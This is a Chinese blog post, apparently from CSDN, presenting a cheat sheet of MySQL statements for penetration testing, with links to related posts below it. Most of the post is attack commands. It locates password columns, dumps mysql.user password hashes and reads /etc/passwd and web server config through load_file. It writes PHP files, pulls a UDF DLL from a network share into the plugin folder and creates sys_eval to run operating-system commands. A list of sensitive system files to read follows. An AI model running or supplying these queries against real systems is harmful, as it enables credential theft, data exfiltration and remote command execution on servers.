渗透中用到的sql语句-mysql篇

最新推荐文章于 2023-03-17 15:17:05 发布
最新推荐文章于 2023-03-17 15:17:05 发布
阅读量316 收藏 2
点赞数
分类专栏: 技术 文章标签: 渗透 取证 mysql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/langouster/article/details/99897958
版权 
# 找到含有密码字段的表
select table_name,column_name from INFORMATION_SCHEMA.COLUMNS where column_name like '%pwd%' or column_name like '%passw%'

#找含有特定内容的表名
SELECT table_name FROM information_schema.tables where table_schema='dbname' and table_name like '%use%';  

# MySQL 5.0.67开始,UDF库必须包含在plugin文件夹中,如果为空就不受限制
select @@plugin_dir
select @@version
select @@datadir
select @@tmpdir

#读取文件
select load_file('/etc/passwd')
select length(load_file('/var/www/html/index.php'))
后面附比较重要的文件

#有的注入方式读取很慢,可以只读一部分
select INSTR(load_file('/etc/httpd/conf/httpd.conf'),'xxx.com')
#读取第3个'DocumentRoot后面的内容
select substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20):

#获取mysql的账号口令hash
SELECT host,user,password,Grant_priv,Super_priv FROM mysql.user

#正在执行的操作 相当于show processlist
SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST

#mysql写文件
select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";
select 0x4d5a900003000xxxxx into dumpfile 'xxx.dll'
select 'xxxx' into file 'xx.php'

#mysql udf
create function sys_eval returns string soname 'udf.dll';  // 安装udf
select * from mysql.func where name = 'sys_eval'; // 验证 
drop function sys_eval;
select sys_eval('dir');

/etc/issue 系统版本
/etc/sysconfig/network-scripts/ifcfg-eth0  可能有ip
/etc/passwd 密码hash
/etc/sysconfig/iptables 防火墙规则
/etc/httpd/conf/httpd.conf  http配置
/etc/crontab	计划任务
种豆得豆1986
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql表增删改查进阶—入门+实战面面俱到
元宝的博客
11-11 1477
Mysql增删改查(进阶) 1.约束类型 NOT NULL - 指示某列不能存储 NULL 值。 UNIQUE - 保证某列的每行必须有唯一的值。 DEFAULT - 规定没有给列赋值时的默认值。 PRIMARY KEY - NOT NULL 和 UNIQUE 的结合。确保某列(或两个列多个列的结合)有唯一标识,有助于更容易更快速地找到表的一个特定的记录。 FOREIGN KEY - 保证一个表的数据匹配另一个表的值的参照完整性。 CHECK - 保证列的值符合指定的条件。对于MySQL数据库,对
Mysql错误使用SQL语句Groupby被兼容的情况
09-10
总结来说,`GROUP BY`语句在SQL用于数据分组,配合聚合函数进行统计计算。在MySQL,如果`GROUP BY`不包含所有非聚合列,结果可能不符合预期,尤其是在`ONLY_FULL_GROUP_BY`模式下。为了保证查询的准确性和跨...
渗透测试-SQL语句
zkjsdk的博客
01-13 572
sql语法.note 1.mysql -u root -p 2.查询当前数据库用户: select user(); 3.查询当前路径: select @@basedir; 4.查询所有数据库: show databases; 5.选择一个数据库; use + 数据库名; 6.查询所有表名: show tables; 7.创建一个数据库 : create database 数据库; 8...
SQL 注入有常用语句
weixin_34234721的博客
01-14 121
是否支持多句查询http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int-- 是否支持子查询http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0 返回用户名http://www.xxx.com/xxx...
渗透常用SQL注入语句大全
woshihaiyong168的博客
09-07 1340
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0 and 0 3.猜帐号数目 如果遇到0 and 0 and 1 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.   and 1=(select count(*) from admin w
渗透常用SQL注入语句合集
滴水石穿
03-15 591
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等… and 0<>(select count(*) from ) and 0<>(select count() from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count() from admin
MySQL与SQL Server的一些区别浅析
09-10
- MySQL不支持`NCHAR`、`NVARCHAR`和`NTEXT`类型,这些在SQL Server用于存储Unicode文本。 2. 自动增长标识: - MySQL使用`AUTO_INCREMENT`来定义自动增长的主键,而SQL Server使用`IDENTITY(1,1)`。 3. ...
python-mysql-replication-main
最新发布
03-04
PyMySQL还提供了执行SQL语句、处理结果集、进行事务操作等功能,这对于监控和维护复制链路非常有用。例如,你可以定期检查复制延迟,或者在检测到错误时自动修复。 ```python sql = "SHOW SLAVE STATUS" with conn....
vs用DbLinq 生成MySql的Linq to SQL实例
11-10
在使用过程,可能会遇到一些特定于MySQL的功能无法直接通过Linq表达,这时可能需要借助于原始的SQL语句或者DbLinq提供的特殊方法。 总的来说,DbLinq为.NET开发者在非SQL Server环境下使用Linq提供了一种途径,...
以数据库字段分组显示数据的sql语句(详细介绍)
09-10
这时,我们可以使用以下SQL语句: ```sql SELECT conf_id, COUNT(*) as participant_count FROM `group` GROUP BY conf_id; ``` 此查询将返回每个`conf_id`及其对应的参会人数。`GROUP BY conf_id`确保了结果集按`...
渗透测试常用sql语句.txt
08-11
渗透测试,测试常用sql语句,一些系统语句,查询语句,常见且实用,建议背诵全文,一些后续会再更新上去。
渗透测试常用SQL语句
XL5L7的博客
03-17 220
like 模糊查询 (select*from bjb where xm like ‘%a%’)[输出xm字段里含a的数据]from bjb order by xh)[知道字段的情况下] [数字,猜字段]from bjb limit 0,1)[从第0行开始输出一条数据]union 条件:字段数必须相同 [将两个表的数据用一个表表示]编程:会进行判断[True|False]=>1|0。sleep()延时 | and 执行有选择。limit n,m 分页 (select。% = 任意数量的任意字符。
mysql 渗透命令_mysql渗透常用几个命令以及含义
weixin_35588980的博客
02-01 233
1.secure_file_priv 文件导入导出功能show global variables like '%secure_file_priv%'; 查看功能是否开启因为secure_file_priv参数是只读参数,不能使用set global命令修改。打开my.cnf 或 my.ini,加入以下语句后重启mysql。secure_file_priv=''查看secure_fi...
mysql渗透_渗透测试MySql注入(一)
weixin_39924179的博客
01-18 536
一、SQL注入条件参数用户可控:前端传递给后端的参数内容是用户可以控制的。参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库执行。二、MySQL注入知识点在mysql5.0之后默认存在一个information_schema数据库,该数据库有三个表特别重要,分别为:SCHEMATA表、TABLES表、COLUMNS表。SCHEMATA表SCHEMA_NAME存放该用户创建的所有数据库...
mysql重要的语句_mysql经典语句
weixin_39903538的博客
02-27 85
1 数据库基础:增删改查:insert into delete update select聚合函数:sum count max min avg排序:order by asc desc子查询:select *from stuinfo where id =(where max(id) from stuinfo)表连接查询:内连接 inner join 左连接: left join 右连接:...
渗透测试之sql注入
weixin_46420165的博客
12-08 2180
SQL 注入(SQL Injection)是发生在 Web 程序数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序事先定义好的 SQL 语句添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
mysql重要的语句_★MySQL一些很重要的SQL语句
weixin_33249666的博客
02-03 134
mysqldumpslow】-s排序选项:c查询次数r返回记录行数t查询时间-t只显示topn条查询mysqldumpslow-sr-t10000slow-queries.log>analysis.log【SQL缓存…】query-cache【PHPmysql相关函数】mysql_list_tables()表查询函数,类似mysql_query()函数m...
mysql渗透常用几个命令以及含义
atw63792的博客
03-09 197
1.secure_file_priv 文件导入导出功能 show global variables like '%secure_file_priv%'; 查看功能是否开启 因为secure_file_priv参数是只读参数,不能使用set global命令修改。 打开my.cnf 或 my.ini,加入以下语句后重启mysql。 secure_file_priv=...
sql with as 到mysql用什么替代
06-09
MySQL 可以使用子查询(subquery)来替代 SQL 的 WITH 子句。 例如,使用 WITH 子句创建一个临时表: ``` WITH temp_table AS ( SELECT column1, column2 FROM some_table WHERE condition ) SELECT * FROM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值